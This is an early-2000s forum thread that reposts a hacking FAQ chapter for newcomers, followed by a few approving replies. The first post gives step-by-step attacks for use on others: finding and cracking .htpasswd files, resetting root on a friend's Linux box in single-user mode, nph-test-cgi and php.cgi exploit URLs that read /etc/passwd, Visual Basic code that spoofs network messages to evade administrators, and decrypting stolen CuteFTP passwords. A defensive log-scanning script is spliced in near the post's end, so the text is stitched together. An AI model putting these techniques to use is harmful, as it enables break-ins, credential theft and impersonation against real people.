
Thread: Newbie Questions Answered - Chapter 4

  1. #1
    AntiOnline Senior Member
    Join Date
    Oct 2001
    Posts
    514

    Post Newbie Questions Answered - Chapter 4

    Here is chapter 4 of newbie questions answered -
    Same as the last 3 chapters, I didn't write this one.

    Chapter 1 -
    http://www.antionline.com/showthread...hreadid=134048

    Chapter 2 -
    http://www.antionline.com/showthread...hreadid=134563

    Chapter 3 -
    http://www.antionline.com/showthread...hreadid=134670
    --------------------------------------------------------------------------------
    Topics covered in Chapter 4

    Breaking into password protected web sites
    What is Linux?
    How can I get root access to a Linux system?
    What is CGI ?
    How to hack web sites (a couple of cgi exploits)
    An interesting little problem and solution
    How to spoof messages with Winpopup or Net Send (messenger service)
    Decrypting CuteFTP passwords

    --------------------------------------------------------------------------------

    Breaking into password protected web sites

    I am sure most of you have been to a web site where you try to access an area or page on the site and suddenly a dialog box appears asking you to enter a username and password. This is pretty common on sites which have sections that they want to keep private for one reason or another. Here is how that works:

    In the directory on the web site which is protected, there is a file almost always called .htpasswd. And in the same directory (or perhaps a different one) there is a file called .htaccess. These two files control access to the 'secure' directory that you want to access. As I mentioned, these two files are most commonly found in the same directory. The idea is that the person who owns the web site can easily stop the public from accessing a directory by simply adding those two files to it. Then, when someone tries to access the directory or a file in the directory - the server checks whether .htpasswd and .htaccess exist in the directory - and if they do, it asks for a username and password.

    The .htpasswd file stores the usernames and passwords (which are encrypted). It basically looks like a unix passwd file - only shorter. Here is an example:

    Graham:F#.DG*m38d%RF

    Webmaster:GJA54j.3g9#$@f

    Notice that the format is:

    Username:Password

    The .htaccess file includes the following information:

    So, what you are probably wondering is "So how can I see the .htpasswd file so that I can read the usernames and passwords out of it?". Well, here is the problem. Only the files inside the directory with the .htaccess file in are protected. If the .htpasswd file is in the same directory as the .htaccess then you can't view the .htpasswd file without getting a correct username and password (you are basically stuffed). However, sometimes the .htpasswd file is outside of the directory (perhaps in the root directory?) so therefore it is not protected!

    So, if I found a secure web site with the following directory passworded:

    http://www.company.com/cgi-bin/protected/

    I know for a fact that there is a file in the /protected/ directory called .htaccess which is protecting it. BUT! What if the .htpasswd is not in the protected directory? To find out whether it is or not - type in a URL like:

    http://www.company.com/cgi-bin/protected/.htpasswd

    If you get an error saying 'File not found' or similar - then you know the file is elsewhere on the server and probably unprotected. So, we need to look around the site a bit to find out where it is - so I look at:

    http://www.company.com/.htpasswd

    http://www.company.com/cgi-bin/.htpasswd

    http://www.company.com/cgi-bin/passwords/.htpasswd

    http://www.company.com/cgi-bin/passwd/.htpasswd

    etc, etc, etc until you either give up or find the file unprotected!

    If you find the file it will look like the examples I gave above - so now you probably want to know how to decrypt the password! This is the great thing - it uses the same encryption algorithm as the unix passwd file!!!! So all you need to do is grab yourself a copy of either "John the ripper", "Crackerjack", or your favourite unix password cracker and run the file against a good wordlist.

    I found a site recently using this technique, and the htpasswd file was just in the root directory! And the guy was using his real name as a password!


    --------------------------------------------------------------------------------

    What is Linux?

    Ok, well a few people asked me this - and it's a good question!

    Linux is an operating system - just like Windows or Dos. It was released at a time when it seemed unlikely an operating system would ever overtake Windows - now it is one of the fastest growing operating systems and many people are switching from Windows to Linux. Linux is a unix type operating system (see volume 1 for 'what is unix?'). Linux uses the same file and directory layout as unix (i.e. you have /etc/ and /bin/). Now, as you know - Unix is a text based operating system like Dos - therefore there are no amazing graphics. This is where people get confused with Linux! Many a time I have mentioned Linux to someone and said "Oh, I have Linux on my pc now" - only to get a response like - "What?!? Why!! It's all text, isn't it, and you can't get any programs for it like you can for Windows!" ... This is, of course, completely wrong!

    Linux can be used exactly like Unix so that when your PC boots up you are greeted with a text prompt asking you to login, and generally it's difficult to tell whether you are using Linux or Unix. The difference between Unix and Linux is simply X.

    "X" is what the graphical side of Linux is called. In Linux you can choose to boot X at start-up so you never see the text Linux. Linux then boots directly into a graphical login screen (which is fully customisable - i.e. you can choose the background, the text it says, the logo it shows etc.). The reason that not many people know that Linux is in fact graphical is because there are so few Linux screen shots around.

    When you login to Linux via X, you will immediately find some things which are similar to windows. For a start, the icons on the desktop are on the left-hand side of the screen - like windows. Also, there is a kind of bar at the bottom which looks a tiny bit like the windows task bar. Please do not get me wrong - Linux is not a windows copy (far from it), but there are similarities in the layout. Now, in my opinion Linux looks far far prettier than windows - the graphics are stunning!

    The other great thing is that you can get windows emulators for Linux (such as the emulator "Wine"). These let you run most of your windows programs on Linux! (Even things like the game "Unreal" and Winzip !!!!). The main advantages that Linux has over any other operating system are:

    Its security (really good)
    Its speed, even on an old 486
    It performs true multi tasking
    It is unbeatable for using the advanced features of the Internet
    Its Networking facilities
    Most of the software for Linux is completely free!
    Its looks
    It's sooooo customisable
    It's open source (more on this in a min)
    It's robust (i.e. it doesn't crash all the time!)
    Core elements of the O/S can be upgraded separately for free
    Linux can handle multiple processors
    Multiple desktops (that’s right! Most Linux distributions give you 4 desktops)
    You can run it on a computer alongside windows
    Phew! Are you getting a taste for it yet? Ok, now let's go a bit more in depth into why it's good.

    Linux is distributed as an "Open source" program. This means that the source code for it comes with it (yes, the source code for the entire operating system!! written in C). Now you may think, "Why write something and then give the source code away so that people can copy it??" - well, Open source has turned out to be the only way to create reliable, high-quality software.

    Think about it! If you give the source code with the program, as soon as someone finds a bug - they can fix it in the code themselves (and therefore not wait for the maker to eventually get around to it). The person who fixes it can then tell other users over the net how to fix it, and therefore the problem disappears in a fraction of the time it would take Microsoft to fix it. So you see, the idea is brilliant. Also, this allows people to TRULY customise the operating system to look and operate exactly how they want it.

    This is why you may have seen loads and loads of different companies selling Linux. Here are just a few different Linuxes you can get:

    Redhat Linux
    Corel Linux
    Linux Mandrake
    Debian Linux
    SuSE Linux
    OpenLinux
    Xpresso Linux
    The list is endless. This is because Linux is completely FREE. Therefore any company can take the source code - modify it beyond belief so that it works in the way they want it to...and then distribute it as their own version. Now, I say Linux is free - well it depends how you get it. You can download any version of Linux from any company's web site for free. If you get it boxed though - you will have to pay (only about £15 / $30). You are not paying for Linux - you are paying for the manuals that you will get with it.

    Ok, so some of you might want to rush out and buy it now - I do have to warn you though - Linux is pretty difficult to install. Linux requires that you create at least two new partitions for it and that you give it quite a lot of detailed information about your hardware. Now, apparently the installations vary considerably depending on which company’s version you buy (apparently OpenLinux can be installed from within windows!). Trust me though - it is worth it.

    Some computerites will make out that you need to be a genius to install it - you don't...If I can do it - anyone can. I have RedHat Linux 6.0 running happily alongside win 95, and I didn't have any installation problems. I also got the program "Gimp" (a really amazing graphics program) and "StarOffice" (a Microsoft office style program) with it. By the way, GIMP and StarOffice are completely free as well (and they are TOP quality).

    Now away with you! Spread the word! (then read the next topic and hack all your friends!)


    --------------------------------------------------------------------------------

    How can I get root access to a Linux system?

    Here's a nice little thing that I have used. I tried this on Redhat Linux 6.0 and it worked. If you are trying this on a system run by someone who knows what they're doing - then this isn't going to work because the chances are they have blocked the use of this technique, but! if you are trying this on someone who knows little about Linux security - then the chances are this will get you in!

    At the lilo (linux loader) prompt type: Linux 1

    The system will boot up and you will be in a shell.

    Now type in 'passwd' and when prompted enter a new password and then re-type it to confirm. You can now reboot the system and login as 'root' with the password you chose!

    There you go! Simple eh? Do it when a friend is out of the room and they won't have a clue how you did it! If anyone is actually interested in how to stop this method from working on your linux box then please email me and request me to cover it (or fill in the online hack faq question form at http://www.wangproducts.co.uk)


    --------------------------------------------------------------------------------

    What is CGI ?

    CGI stands for Common Gateway Interface. Most web sites on the Internet use cgi programs (called cgi scripts) to perform useful functions 24 hours a day. CGI scripts are essentially programs which are written and then uploaded to a web site. CGI scripts can be written in a variety of different languages, the most popular being:

    Perl
    C / C++
    VBscript
    Perl is the most commonly used of the above. Not all servers support all the languages above, it may be that a server only lets you use Perl scripts or only VBscripts.

    Usually, cgi scripts are kept in a directory on the web site called /cgi-bin/ - it is not uncommon to be taken to a web site where the address is something like:

    http://www.company.com/cgi-bin/login.cgi

    CGI scripts are used because they allow your web pages to call programs which can run 24 hours a day (unless the damn site goes down). The uses of CGI scripts include:

    Creating visitor counters
    Allowing visitors to fill in forms on the web site and send them
    Creating guest books
    Managing username and password access
    Managing mailing lists
    Providing web email services
    Providing random messages/links
    Allowing people to upload files to your web site
    Counting file downloads
    Retrieving information about the visitors
    Password protecting certain aspects of the web site
    Providing detailed error messages
    The list is endless. This is why cgi scripts are so good - because they can be customised to serve any task you want. CGI scripts do not need to be compiled like normal programming languages - you can even write a quick script in notepad and then upload it to your site.


    --------------------------------------------------------------------------------

    How to hack web sites (a couple of cgi exploits)

    We will be looking at a couple of cgi exploits that may allow you to gain access to a web site or server. The first is the nph-test-cgi exploit.

    This exploit can be used to display information about a web site/server if you know how to use it properly! Here is what you do:

    1) Type the url into your web browser.

    2) Add this to the end: /cgi-bin/nph-test-cgi

    3) The address should now look something like: http://www.servername.com/cgi-bin/nph-test-cgi

    4) See if you get an information screen like this appear:

    5) If you do, then you can use this information to learn more about the web site - and do a bit more. If you get an error message of some sort then sorry, the exploit isn't available on this site.

    6) Now we can exploit this server some more and see exactly what's in every directory on the system! You do this by using this syntax: /cgi-bin/nph-test-cgi?<directory>/*

    7) So, if you wanted to see what was in the 'etc' directory (where the password file is) you could type in something like this: http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*

    8) If you want to look inside the root directory then type:

    http://www.servername.com/cgi-bin/nph-test-cgi?/*

    Now onto the next exploit!

    The next exploit is one which will actually allow you to view any file on the server! Here's what you do:

    1) Type the url into your web browser.

    2) Add this to it: /cgi-bin/php.cgi?<a filename>

    3) So for example, to get the password file from www.servername.com you would type this:

    http://www.servername.com/cgi-bin/php.cgi?/etc/passwd

    4) Then as long as the password file isn't shadowed (see previous hack faq volumes) you will be able to run the password file through a cracker and get access to the whole server.

    Finding a system with both these exploits on can be done which effectively gives you access to the whole system! Use this wisely!


    --------------------------------------------------------------------------------

    An interesting little problem and solution

    First of all, I am only covering the topic because it is something I have been seeing a lot of lately - and frankly it's great and easy to do! Now, this relates to programs that have pre-assigned passwords in them. By this I mean that the creator of the program has actually specified a password within the program's code which can not be changed. Why would they do this? Well, this mostly relates to amateur programmers or people who have written programs for use only by themselves. It also relates to people who have made programs which allow you to put your own password on them. Sometimes the maker of the program will put his own 'backdoor' password in which allows him to get access to anyone's copy of the program.

    But first, you may be thinking "Why the hell is he telling us this! I don't want to break into crappy programs!" - well that's what I thought! - until the other day. I was messing around with a trojan program on my computer and I deliberately infected myself to see what it was like - thinking I would easily be able to remove it. It turned out this trojan was really clever. Basically (practically) the only way to remove it was by actually telnetting to yourself and giving the command 'removetrojan' which was meant to get rid of all traces of it off of your computer. The only problem was - when I telnetted to myself, this came up:

    XXX Trojan Server

    Password :

    agh! I thought, obviously the trojan had automatically passworded itself. I calmed down and thought carefully about the situation. I had an idea! If it had automatically passworded itself, then the password must have been specified somewhere in the code by the creator. I decided to take a crafty look at the exe file with a hex editor. You can get a hex editor off the internet for free off most sites (do a search for 'hex editor'). Basically a hex editor shows you the working of the file.

    I loaded my hex editor and got it to look at the trojan.exe file. Then I did a text search for the phrase 'Password' (exactly what the program greeted me with when it asked for the access password). I found one piece of text which said Password - but after it was just a load of rubbish. I chose 'Search again' - this time something interesting came up:

    Password :Ävz*ô_€

    yô_*hahaha112233

    Access DeniedP¢B

    "Hey!" I thought. That 'Password :' is exactly the password prompt - and look what it's followed by (ignore the rubbish, you always get rubbish in the files) 'hahaha112233'. The next readable bit is 'Access Denied' - which is what the trojan says if you get the wrong password! - this verified to me that I was in the right place in the exe file. I telnetted to myself again and typed the password in as 'hahaha112233'. Bingo! I was in the server and I was able to remove the trojan.

    So the point is - if the programmer specifies a password in the code when he writes it, most of the time you will be able to hex edit the file and find the password in plaintext! This is something which you should avoid in your own programs - but hey! next time you get stumped for a password to a program, try this technique. Also, try it on your friends' programs!


    --------------------------------------------------------------------------------

    How to spoof messages with Winpopup or Net Send (messenger service)

    If you have access to a Local area network at your place of work or college/school that uses Windows 95/98 computers then the chances are you have winpopup on your network. If your network uses Windows NT computers then you probably have the equivalent program - Net Send or Messenger Service.

    Winpopup and Net Send are both messaging services for networks. The idea is that you're meant to be able to enter someone's login name or computer name and then (as long as they have the program open as well) send them a short message which will appear on their screen. Basically, it's just a laugh to send stupid messages backwards and forwards to your friends.

    When a message arrives, your computer name is shown as the sender. Now, if you're sending messages about hacking or other dangerous subjects the chances are that your network administrator is going to see and watch you closely. So, we want to know how to spoof a message so that it appears to be from someone else or someone who doesn't exist. Both Winpopup.exe (usually located in the c:\windows directory) and Net Send (not sure where this one is on NT - look for yourself. Apparently you use the command 'NET SEND computername message'.) use the same protocol - 'Mailslots'.

    Here is the visual basic source code to spoof a message. You will need to create a form (called Form1) with the following:

    Text box called "Text1"
    Text box called "Text2"
    Text box called "Text3"
    Command Button called "Command1"
    Then under the code for form1 - paste the following in:

    Option Explicit

    ' Win32 constants used by the CreateFile / WriteFile calls below
    Const MAILSLOT_WAIT_FOREVER = (-1)
    Const OPEN_EXISTING = 3
    Const GENERIC_READ = &H80000000
    Const GENERIC_WRITE = &H40000000
    Const GENERIC_EXECUTE = &H20000000
    Const GENERIC_ALL = &H10000000
    Const INVALID_HANDLE_VALUE = -1
    Const FILE_SHARE_READ = &H1
    Const FILE_SHARE_WRITE = &H2
    Const FILE_ATTRIBUTE_NORMAL = &H80

    ' Win32 API declarations (a mailslot is opened and written like a file)
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long
    Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, ByVal lpBuff As Any, ByVal nNrBytesToWrite As Long, lpNrOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
    Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwAccess As Long, ByVal dwShare As Long, ByVal lpSecurityAttrib As Long, ByVal dwCreationDisp As Long, ByVal dwAttributes As Long, ByVal hTemplateFile As Long) As Long

    Private Sub Command1_Click()
        Dim rc As Long
        ' Text1 = sender shown, Text2 = recipient (login or computer name), Text3 = message
        rc = SendMsg(Text1.Text, Text2.Text, Text3.Text)
        If rc = 0 Then MsgBox "Could not deliver the message"
    End Sub

    ' Writes one messenger-service datagram to the recipient's mailslot.
    ' Returns non-zero on success, 0 if the mailslot could not be opened or written.
    Function SendMsg(From1 As String, To2 As String, Text3 As String) As Long
        Dim rc As Long
        Dim mshandle As Long
        Dim msgtxt As String
        Dim byteswritten As Long
        Dim mailslotname As String

        ' name of the mailslot the messenger service listens on
        mailslotname = "\\" + To2 + "\mailslot\messngr"
        ' message body: sender, recipient and text, each terminated by a NUL byte
        msgtxt = From1 + Chr(0) + To2 + Chr(0) + Text3 + Chr(0)

        mshandle = CreateFile(mailslotname, GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, -1)
        If mshandle = INVALID_HANDLE_VALUE Then
            SendMsg = 0
            Exit Function
        End If

        rc = WriteFile(mshandle, msgtxt, Len(msgtxt), byteswritten, 0)
        CloseHandle mshandle
        SendMsg = rc
    End Function


    '----------------------------- END OF CODE -------------------------------------

    Now, to use this program:

    Compile it to a .exe
    Run it
    In "text1" enter who you want the message to appear to be from (whatever you want).
    In "text2" enter who the message is to (either their login name or their computer name).
    In "text3" enter your message.
    Press the command button to send your message!
    I'm sure you can think of your own uses for this program!


    --------------------------------------------------------------------------------

    Decrypting CuteFTP passwords

    CuteFTP is a popular FTP (File transfer protocol) program. FTP servers are what people use to upload and download files from servers. The most popular use of FTP is for uploading files to a web site. If your web space supports ftp transfers then you can use a free program like CuteFTP to manage your web site from within windows.

    CuteFTP has the feature of a 'site manager'. The manager allows you to enter all the details needed to connect to your FTP servers so that you can quickly connect to them by just clicking its name. The best feature of this is that it also stores your username and password so that you do not need to enter it every time you connect. Once you enter all the details for your servers, the information is placed in a file in the CuteFTP directory called "SmData.dat".

    All your servers' connection information is kept in this file - along with your username and password. The username is stored in plaintext and the password is encrypted using a simple character substitution. Therefore, it is easy for a hacker to get hold of the SmData.dat file and then decrypt the passwords. This leaves the hacker with full access to all the victim's servers (which are likely to be his web sites).

    The reason I am explaining this to you is so you know what to look for if you gain access to your target's computer via whatever techniques you use (physical access, trojans, system vulnerabilities etc.). The Smdata.dat file is a very small file, but if you have it you will gain a lot of information.

    Here is how the encryption scheme of the Smdata.dat file works, and how to decrypt it:

    Open up the Smdata.dat file in a text editor. Near the end of the file, the user records are stored.

    The following is an example of such records taken from an Smdata.dat:

    $^?^DWebsite.ftp.mywebsite.com^Dwebmaster^H©?«^?^?^??º ^B ^? ^U ^B ^?^?^?^?^B ^B ^B ^B ^B ^A

    ^B $^?^DWork.www.mywork.com^Danonymous^H¸©»»¿§?¬^Yinnitial remote directory^Qinitial

    directory comments^B ^? ! ?^Cd ªzY^A^B ^B ^B ^B ^B ^Vlocal directory filter^[

    remotee directory filteeeer^A

    ^B

    The $ sign at the beginning means the start of a new record, and this is followed by a number of fields which are delimited by a different ASCII character each time. The records use the following format:

    $^?^Drecord name.ip address^Dusername^Hencrypted password^B ^?

    So this means that the first record in the example above contains this information:

    RECORD NAME = Website

    IP ADDRESS = ftp.mywebsite.com

    USERNAME = webmaster

    PASSWORD = ©?«^?^?^??º

    Notice that the fields after this are left blank. This makes CuteFTP use its default values. Now to decrypt the password.

    The example above used the password "abcABC>?". From this you can see that a=© b=? etc. etc. So, now we know that it simply uses the character replacement scheme - we need to find out what every single letter and number is replaced with (so we can build a decryption table, or write a program to do the decryption work for us). Therefore we need to encrypt the following string with CuteFTP:

    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()`~-=\[]';,./_+|{}:"<>?

    Now if you look in the Smdata.dat file and see the encrypted version of the above string - you will have all the information you need to decrypt anyone's Smdata.dat !

    uraloony, Founder of Loony Services
    Visit us at
    http://www.loonyservices.com/
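    The two web sections above ("Breaking into password protected web sites" and the cgi exploits) describe requests that a server administrator can spot in the access log: fetches of .htpasswd/.htaccess, nph-test-cgi called with an argument, and php.cgi given an absolute path. This is an added example, not code from the original post; it assumes Apache combined log format and uses constructed log lines, and its rule names are made up for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2001:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Oct/2001:10:01:09 +0000] "GET /cgi-bin/protected/.htpasswd HTTP/1.0" 404 210 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Oct/2001:10:01:15 +0000] "GET /.htpasswd HTTP/1.0" 200 57 "-" "Mozilla/4.0"
10.0.0.7 - - [12/Oct/2001:10:02:00 +0000] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 200 812 "-" "Mozilla/4.0"
10.0.0.7 - - [12/Oct/2001:10:02:07 +0000] "GET /cgi-bin/nph-test-cgi?/etc/* HTTP/1.0" 200 2300 "-" "Mozilla/4.0"
10.0.0.7 - - [12/Oct/2001:10:02:20 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 1402 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Oct/2001:10:03:00 +0000] "GET /cgi-bin/login.cgi HTTP/1.0" 200 310 "-" "Mozilla/4.0"
"""

# client IP, timestamp, method, request target and status code from one combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def classify(target):
    """Return the (made-up) rule names matched by one request target, or [] if it is benign."""
    path, _, query = unquote(target).partition('?')
    name = path.rsplit('/', 1)[-1].lower()
    hits = []
    # the access-control files themselves should never be requested by a browser
    if name in ('.htpasswd', '.htaccess'):
        hits.append('htaccess-file-request')
    # nph-test-cgi with any argument is the directory-listing trick (?<dir>/*)
    if name == 'nph-test-cgi' and query:
        hits.append('nph-test-cgi-argument')
    # php.cgi asked for an absolute path is the arbitrary-file-read pattern
    if name == 'php.cgi' and query.startswith('/'):
        hits.append('php.cgi-absolute-path')
    return hits


def scan(log_text):
    """Parse each line; return (ip, target, status, rules) for every line that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rules = classify(m['target'])
        if rules:
            findings.append((m['ip'], m['target'], int(m['status']), rules))
    return findings


def exposed_files(findings):
    """Targets where an .htpasswd/.htaccess request got a 200: the file was actually served."""
    return [t for _, t, status, rules in findings
            if 'htaccess-file-request' in rules and status == 200]


def by_source(findings):
    """Flagged requests per client IP; repeated misses from one host look like location guessing."""
    counts = {}
    for ip, _, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for ip, target, status, rules in found:
        print(ip, status, target, ','.join(rules))
    print('served access-control files:', exposed_files(found))
    print('per source:', by_source(found))
```

    A 404 for a guessed .htpasswd location is only a probe; a 200 means the file left the server and the hashes in it should be treated as compromised.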

  2. #2
    Senior Member
    Join Date
    Oct 2001
    Posts
    232

    Very Informative

    The article that you wrote is very interesting... as well as informative. I especially liked the part of where you put some detail into Linux and why it is a good OS.

    I give your article out of five!

    Welcome to Hell , where we have served more than all of the fast food chains put together! And the number grows everyday! Stay tuned!

  3. #3

    Cool

    It's really good stuff..

    Be Cool ..


  4. #4
    Very informative!! I have been using linux for about a year and a half now. I have setup my own web server, dns server, mysql server, etc..I wanted to know more. This is definitely a step in the right direction and a good source of info for us newbies.
    Bolt actions speak louder than words.
